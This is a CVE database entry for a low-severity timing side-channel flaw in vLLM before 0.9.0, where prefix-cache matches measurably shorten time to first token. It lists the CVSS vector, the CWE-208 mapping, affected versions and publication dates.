CVE-2025-46570

May 30, 2025, 4:31 p.m.

2.6
Low

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Product(s) Impacted

Vendor Product Versions
Vllm
  • Vllm
  • <0.9.0

Weaknesses

Common security weaknesses mapped to this vulnerability.

CWE-208
Observable Timing Discrepancy
Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.

*CPE(s)

Affected systems and software identified for this CVE.

Type Vendor Product Version Update Edition Language Software Edition Target Software Target Hardware Other Information
a vllm vllm <0.9.0 / / / / / / /

CVSS Score

2.6 / 10

CVSS Data - 3.1

  • Attack Vector: NETWORK
  • Attack Complexity: HIGH
  • Privileges Required: LOW
  • Scope: UNCHANGED
  • Confidentiality Impact: LOW
  • Integrity Impact: NONE
  • Availability Impact: NONE
  • CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

    View Vector String

Timeline

Published: May 29, 2025, 5:15 p.m.
Last Modified: May 30, 2025, 4:31 p.m.

Status : Awaiting Analysis

CVE has been recently published to the CVE List and has been received by the NVD.

More info

Source

security-advisories@github.com

*Disclaimer: Some vulnerabilities do not have an associated CPE. To enhance the data, we use AI to infer CPEs based on CVE details. This is an automated process and might not always be accurate.